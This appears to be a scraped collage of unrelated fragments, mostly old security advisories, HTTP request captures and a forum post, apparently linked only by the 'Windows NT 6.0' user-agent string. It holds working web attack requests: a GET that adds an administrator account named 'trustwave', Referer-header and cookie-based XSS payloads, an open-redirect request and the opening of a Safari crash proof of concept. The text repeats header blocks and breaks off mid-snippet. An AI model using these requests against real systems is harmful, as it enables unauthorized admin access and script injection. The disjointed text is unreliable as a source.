Windows NT 6.0
"trustwave" to the administrative user group.
#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
2) Referer header XSS attack - data needs to be sent using the POST method
POST https://target-domain.foo:2381/hmaserv/common/setitem.php
host: target-domain.foo:2381
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.8)
Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)
Referer: http://www.procheckup.com</script><script>alert(1)</script>
Cookie:
Compaq-HMMD=0001-7252052a-43b2-fb4a-951f-78af9561826a-1275875265807763;
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive
POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1;
.NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive
GET
/WebID/IISWebAgentIF.dll?Redirect?url=ftp://bo.mirror.garr.it/pub/mirrors/Mandrake/devel/cooker/i586/index.htm
HTTP/1.1
Host: target-domain.foo
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11)
Gecko/20071127 Firefox/2.0.0.11
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
> Tested on:
> Windows Vista Version Service Pack 1 Build 6001
> Processor Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz,
> 2401 Mhz, 2 Core(s), 2 Logical Processor(s)
>
> User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;
> rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
> (.NET CLR 3.5.30729)
> ============================================================
This is the firefox user agent string...
The Apple Safari browser is prone to a denial of service vulnerability when parsing certain HTML content.
This is possible due to a failure in handling exceptional conditions. This issue is caused by a memory corruption error when handling javascript elements, which could be exploited by remote attackers to crash the browser by tricking a user into visiting a specially crafted web page.
This issue can NOT be lead to remote code execution, so that the potential security risk is rated low.
The exploit has been tested on Windows Vista SP2 with Safari 4.0.4 using following useragent:
Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Proof of Concept:
============
<script>
var overloadtag = "<marquee>";
Cookie: webmailSession=0; cookieTest=cookiesEnabled; checkOverQuota=0;
passwordExpireWarning=0
Host: 192.168.0.222:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
While investigating this alert, I've discovered that this vulnerability
is more serious than I initially expected. This is a very serious
vulnerability because using information from the log files it's possible
to gather enough information to read the file containing all the emails
Tested on:
Windows Vista Version Service Pack 1 Build 6001
Processor Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz,
2401 Mhz, 2 Core(s), 2 Logical Processor(s)
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;
rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
(.NET CLR 3.5.30729)
============================================================
============================================================
GET
/WebID/IISWebAgentIF.dll?Redirect?url=ftp://bo.mirror.garr.it/pub/mirrors/Mandrake/devel/cooker/i586/index.htm
HTTP/1.1
Host: target-domain.foo
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11)
Gecko/20071127 Firefox/2.0.0.11
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
GET /dana/nc/ncrun.cgi?launch_nc=1 HTTP/1.1
Host: 10.0.5.23
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://10.0.5.23/dana/home/index.cgi
Cookie: DSPREAUTH=; DSFirstAccess=1255332662; DSHCSTARTED=x;
DSASSERTREF=x; DSLastAccess=1255332662; lastRealm=Users;
DSSignInURL=/e6cf2"><script>alert(1)</script>81d17f3a375;
<name></name>
<website />
<comment></comment>
<date></date>
<user_ip>127.0.0.1</user_ip>
<user_agent>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5</user_agent>
<spam>0</spam>
</message>
###########################################################################
###########################################################################
GET /index.php?page=Poem/Poem.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/x-silverlight, */*
Accept-Language: en-au
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Host: www.footprints-inthe-sand.com
Connection: Keep-Alive
It could either be because of what Sean said with the Range request or the Partial GET Request in Firefox. But I think you are probably correct Rolphin, as I've had a lot of Windows Media Player crashes recently. Either way, Windows Media Player should probably not be incorporated into Firefox if it's going to crash. A more stable platform should be used (such as Silverlight)
installed) will use whatever the default media player is on your PC.
> Accept-Language: en-au
> UA-CPU: x86
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
> Host: www.footprints-inthe-sand.com
> Connection: Keep-Alive
>
> It could either be because of what Sean said with the Range request or the Partial GET Request in Firefox. But I think you are probably correct Rolphin, as I've had a lot of Windows Media Player crashes recently. Either way, Windows Media Player should probably not be incorporated into Firefox if it's going to crash. A more stable platform should be used (such as Silverlight)
|
